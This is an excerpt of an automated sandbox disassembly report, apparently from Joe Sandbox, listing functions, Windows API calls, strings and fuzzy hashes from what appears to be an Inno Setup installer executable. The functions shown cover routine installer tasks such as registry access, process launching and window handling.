Instruction ID: 2b3bc76bcbe24f9a378c9fd2a9d0a5bd871778c5a23a50a9ca37bd21dd0b5b9e
Opcode Fuzzy Hash: d198827404060030b3dfc17e22509fcb3a77ecf8fff02d6a53b0f294283eb161
Instruction Fuzzy Hash: C2F030B574470176EA10B7B69C47F1B228C8B54745F14483ABA00EB2C3D97CD904966D

Function 0046FFEC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 0047003D

Strings

Failed to set NTFS compression state (%d)., xrefs: 0047004E
Setting NTFS compression on directory: %s, xrefs: 0047000B
Unsetting NTFS compression on directory: %s, xrefs: 00470023

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: 501c20c4b4589d314784abe810e87fd7af79d86b38d8ef254cb346fbb93d82bb
Instruction ID: 604d54a06cc176a09f793a0f1904e0e91a55842988fe096117b9dad4a0540a88
Opcode Fuzzy Hash: 501c20c4b4589d314784abe810e87fd7af79d86b38d8ef254cb346fbb93d82bb
Instruction Fuzzy Hash: 96011731D0D288A6CB04D7AD70417DDBFB49F49314F44C1EFA459E7282DB790909879A

Function 0047D1CC Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0047D1ED
GetLastError.KERNEL32 ref: 0047D1F7
GetTickCount.KERNEL32 ref: 0047D201
Sleep.KERNEL32(00000032), ref: 0047D211

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 9d8c620ac145a49ef357bc67e7af840132a63e2ed6bee5855d7efcfcc9ec2cde
Instruction ID: ce153dc38a8bb7651996ca8f0dac3f9c26bc2c6ac7669c34f37b685d31f90408
Opcode Fuzzy Hash: 9d8c620ac145a49ef357bc67e7af840132a63e2ed6bee5855d7efcfcc9ec2cde
Instruction Fuzzy Hash: D1E0E562B59140658A2431FE18C25BF85A8CECA364B18867FE4C9D6243CC5D8C0786BF

Function 00478640 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,00000001,00000000,00000002,00000000,004817AB,?,?,?,?,?,004993B3,00000000,004993DB), ref: 00478649
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000001,00000000,00000002,00000000,004817AB,?,?,?,?,?,004993B3,00000000), ref: 0047864F
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,00000001,00000000,00000002,00000000,004817AB), ref: 00478671
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,00000001,00000000,00000002,00000000,004817AB), ref: 00478682

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 897cebff796fb9acf24ada6806b428e4bae0fdb6bab1f730a63c16ba700ca759
Instruction ID: 838b6a51ddc7838befbc46fdc110c266dd1fb76be3e125ebbed13216a87d498a
Opcode Fuzzy Hash: 897cebff796fb9acf24ada6806b428e4bae0fdb6bab1f730a63c16ba700ca759
Instruction Fuzzy Hash: 8CF01CB16443007BD600EAA58C82A9B72DCEB44754F04883E7A98CB2D1DA79D808AB66

Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetLastActivePopup.USER32(?), ref: 0042425C
IsWindowVisible.USER32(?), ref: 0042426D
IsWindowEnabled.USER32(?), ref: 00424277
SetForegroundWindow.USER32(?), ref: 00424281

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveEnabledForegroundLastPopupVisible
String ID:
API String ID: 2280970139-0
Opcode ID: 0c1e0aa051013007664b3f07c8d487170f49f724953434a4891b7e2a8b6b14ea
Instruction ID: 2755c926dfb62d6ecb2d5c8fb2e1e882bb3f56b09ddc897a1aa573e645a4fcd2
Opcode Fuzzy Hash: 0c1e0aa051013007664b3f07c8d487170f49f724953434a4891b7e2a8b6b14ea
Instruction Fuzzy Hash: 99E0EC61B0257196AAB1EA7B2881A9F118CDD46BE434602A7FD41F7287DB2CDC1045BD

Function 0040627C Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

GlobalHandle.KERNEL32 ref: 0040627F
GlobalUnlock.KERNEL32(00000000), ref: 00406286
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040628B
GlobalLock.KERNEL32(00000000), ref: 00406291

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Global$AllocHandleLockUnlock
String ID:
API String ID: 2167344118-0
Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
Instruction ID: 024a49765fc045a09389489d8ed5919b86daafa6bea6a005e9f609907830066e
Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
Instruction Fuzzy Hash: 64B009C6925A46B8EC0473B24C4BD3F041CE88472C3809A6E7554BA0839C7C9C002E3A

Function 0047A69C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BF85,?,00000000,00000000,00000001,00000000,0047A939,?,00000000), ref: 0047A8FD

Strings

Failed to parse "reg" constant, xrefs: 0047A904
Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A771

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Close
String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
API String ID: 3535843008-1938159461
Opcode ID: 731d09dfe04126c7ce286a995487c84b6acd3a7555e11f1b87038d18dfc9fa91
Instruction ID: ad7b2ad32a4e046eb061743552de15717f644d650d615c3b0b0b82a4ca8416c6
Opcode Fuzzy Hash: 731d09dfe04126c7ce286a995487c84b6acd3a7555e11f1b87038d18dfc9fa91
Instruction Fuzzy Hash: D78182B4E00148AFCB11EF95C481ADEBBF9AF88344F10856AE814B7391D738DE15CB99

Function 00483A70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00483BFA,?,00000000,00483C3B,?,?,?,?,00000000,00000000,00000000,?,0046BE99), ref: 00483AA9
SetActiveWindow.USER32(?,00000000,00483BFA,?,00000000,00483C3B,?,?,?,?,00000000,00000000,00000000,?,0046BE99), ref: 00483ABB

Strings

Will not restart Windows automatically., xrefs: 00483BDA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveForeground
String ID: Will not restart Windows automatically.
API String ID: 307657957-4169339592
Opcode ID: fd112b4c8de44069fed4ab784b6429e18bede020499d5fe5eba8df49eb47ae3b
Instruction ID: 00c250453c0a17a9e15f8b7c17bf5d610a6a62ae57f998986b3a61a72a87f8d4
Opcode Fuzzy Hash: fd112b4c8de44069fed4ab784b6429e18bede020499d5fe5eba8df49eb47ae3b
Instruction Fuzzy Hash: 79411270A04280AEDB11FF25DC56BAD7BE4AB14B09F140C7BE8405B3A3C27D7A45971E

Function 004767E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105timeCOMMON

Download Yara Rule

APIs

LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,0047691B,?,00000000,0047692C,?,00000000,00476975), ref: 004768EC
SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,0047691B,?,00000000,0047692C,?,00000000,00476975), ref: 00476900

Strings

Extracting temporary file: , xrefs: 00476828

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileTime$Local
String ID: Extracting temporary file:
API String ID: 791338737-4171118009
Opcode ID: 8bb9d3133b1fb9ec8af2f49f23ff7fadb73ae79880f698f59a04eeed571ff557
Instruction ID: d70a0822c1878ba5cc3cea7231243a1bdea1af23cb32f526b41bd2dcbb3c8472
Opcode Fuzzy Hash: 8bb9d3133b1fb9ec8af2f49f23ff7fadb73ae79880f698f59a04eeed571ff557
Instruction Fuzzy Hash: 5D41CB70E00649AFCB01EFA5C891ADFBBB9EF09304F51847AF914A7391D7789905CB54

Function 0046CD0C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

Failed to proceed to next wizard page; aborting., xrefs: 0046CE24
Failed to proceed to next wizard page; showing wizard., xrefs: 0046CE38

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
API String ID: 0-1974262853
Opcode ID: bd600112513020f620d7d4569e21eaae9941e9eb8c4aa750224beaba235140ee
Instruction ID: b126ef70070b574b462b5ad6e8f6b62ab94db58f07a08aa979416f05a1434e77
Opcode Fuzzy Hash: bd600112513020f620d7d4569e21eaae9941e9eb8c4aa750224beaba235140ee
Instruction Fuzzy Hash: 5931A2306042009FD711EB59D989BA97BF9AB05304F6500BBF448AB3A2D778AE44DB59

Function 004792D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(?,004793BA,?,?,00000001,00000000,00000000,004793D5), ref: 004793A3

Strings

%s\%s_is1, xrefs: 0047934C
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047932E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 47109696-1598650737
Opcode ID: 3354c75471e71dfe397ad959b7ebf057644b34f0928cd67ef0d370c48c0a0807
Instruction ID: 81948899c858854939f702104da2ecae25413b277659753d1c8da10ae03f2604
Opcode Fuzzy Hash: 3354c75471e71dfe397ad959b7ebf057644b34f0928cd67ef0d370c48c0a0807
Instruction Fuzzy Hash: 7E216174A046446FDB11DFA9CC51AAEBBF8EB4D704F90847AE808E7381D7789D018B99

Function 004501DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 00450271
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004502A2

Strings

open, xrefs: 00450295

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ExecuteMessageSendShell
String ID: open
API String ID: 812272486-2758837156
Opcode ID: 1d47999e67842d91bbdff3080109e9f99b92e08493ad044d5529b9a4f90a2308
Instruction ID: 579e8a969fc791085b17213fdcb8cb543336c6f56b5ff41e9c914d75dd94f84d
Opcode Fuzzy Hash: 1d47999e67842d91bbdff3080109e9f99b92e08493ad044d5529b9a4f90a2308
Instruction Fuzzy Hash: 9D215174A00204AFDB04DFA5CC85B9EB7F9EB44705F2085BAB404E7292DB789E45CA48

Function 00455304 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 004553A0
GetLastError.KERNEL32(0000003C,00000000,004553E9,?,?,00000001,00000001), ref: 004553B1

Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7

Strings

<, xrefs: 0045535A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DirectoryErrorExecuteLastShellSystem
String ID: <
API String ID: 893404051-4251816714
Opcode ID: afd5839f8e658dd33c6cf15c07b37cc62197e7a91b642cac2381ff1ff0064e27
Instruction ID: 1baeac92009e3f48d7e72975e94fd539b808c95e86e95f0c8891d74cc8928d66
Opcode Fuzzy Hash: afd5839f8e658dd33c6cf15c07b37cc62197e7a91b642cac2381ff1ff0064e27
Instruction Fuzzy Hash: 51213570A04649AFDB10DF65D8926AE7BF8AF08355F90403BFC44E7381D7789E498B98

Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049C420,00000000,)), ref: 004025C7
RtlLeaveCriticalSection.KERNEL32(0049C420,0040263D), ref: 00402630

Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049C420,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049C420,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049C420,00401A89,00000000,00401A82,?,?,0040222E,021875C4,000011E0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

), xrefs: 004025AE

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: )
API String ID: 2227675388-1084416617
Opcode ID: 94eed0a9be2c3ee170c705f4af63db45f02aa9b7064399c91cb7111f76640db2
Instruction ID: 1fa17fb08616f6b4eef2bbe9ac14d29337f111a30cd6b0cffb698505e2c33406
Opcode Fuzzy Hash: 94eed0a9be2c3ee170c705f4af63db45f02aa9b7064399c91cb7111f76640db2
Instruction Fuzzy Hash: A21134307042006FEB10AB795F6A62A6AD4D795358B60087FF404F32D2D9BD8C02825C

Function 00497206 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00497241

Strings

@, xrefs: 0049720C
/INITPROCWND=$%x , xrefs: 0049726C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: 5a103d45b4538b44b7d3fd145df9eaa2b16f7591657a5688a99aa9ff68a700bd
Instruction ID: 05f588258c78c5b50029c9c11ed11213d1445aaa1ba567bca7741b432d444d98
Opcode Fuzzy Hash: 5a103d45b4538b44b7d3fd145df9eaa2b16f7591657a5688a99aa9ff68a700bd
Instruction Fuzzy Hash: A611A571A282089FDB01DBA5D851FAEBBE8EB48314F5084BBF904E7291D63C9905CB5C

Function 00447488 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

SysFreeString.OLEAUT32(?), ref: 0044753A

Strings

Unknown Method, xrefs: 00447513
NIL Interface Exception, xrefs: 004474DC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: String$AllocByteCharFreeMultiWide
String ID: NIL Interface Exception$Unknown Method
API String ID: 3952431833-1023667238
Opcode ID: b5b3b2027cd9392a30aef52b357f29023a93b6cb0369269594e46825eb3d0212
Instruction ID: e21740dd19ee0d3aaa7bf219fd9fa850e2e2e771d5dc584e192d83827b059975
Opcode Fuzzy Hash: b5b3b2027cd9392a30aef52b357f29023a93b6cb0369269594e46825eb3d0212
Instruction Fuzzy Hash: 9211E930A04204AFEB00DFA59D42A6EBBBCEB49704F51447AF500EB681DB789D00CB69

Function 00496A78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496B40,?,00496B34,00000000,00496B1B), ref: 00496AE6
CloseHandle.KERNEL32(00496B80,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496B40,?,00496B34,00000000), ref: 00496AFD

Part of subcall function 004969D0: GetLastError.KERNEL32(00000000,00496A68,?,?,?,?), ref: 004969F4

Strings

D, xrefs: 00496AC0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: D
API String ID: 3798668922-2746444292
Opcode ID: 8c076d8b975d6b314500e760c1b31ec559303ffe873c3baf39058a33e9a74c9f
Instruction ID: 4578fedeb831857a9fa7b324a6e48fa42854d3e5b1879a7f0481b0c617fb48be
Opcode Fuzzy Hash: 8c076d8b975d6b314500e760c1b31ec559303ffe873c3baf39058a33e9a74c9f
Instruction Fuzzy Hash: 050165B1644148AFDF00DBD6CC92F9F7BACDF49714F52407BB504E7281E6789E058619

Function 0042DD74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8

Strings

Inno Setup: No Icons, xrefs: 0042DD86

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Value$EnumQuery
String ID: Inno Setup: No Icons
API String ID: 1576479698-2016326496
Opcode ID: 8eee03c1fbfc328194d38fab97817ecd3167584576368d321fe403edd0428e5d
Instruction ID: 8a75d463627faac0db3bfd1327658b2d26d196a72fd2cd26e512c66f67a8876f
Opcode Fuzzy Hash: 8eee03c1fbfc328194d38fab97817ecd3167584576368d321fe403edd0428e5d
Instruction Fuzzy Hash: E0012B36F5A77079F73046216D02BBB56888B82B60F68053BF940EA2C0D6589C04D36E

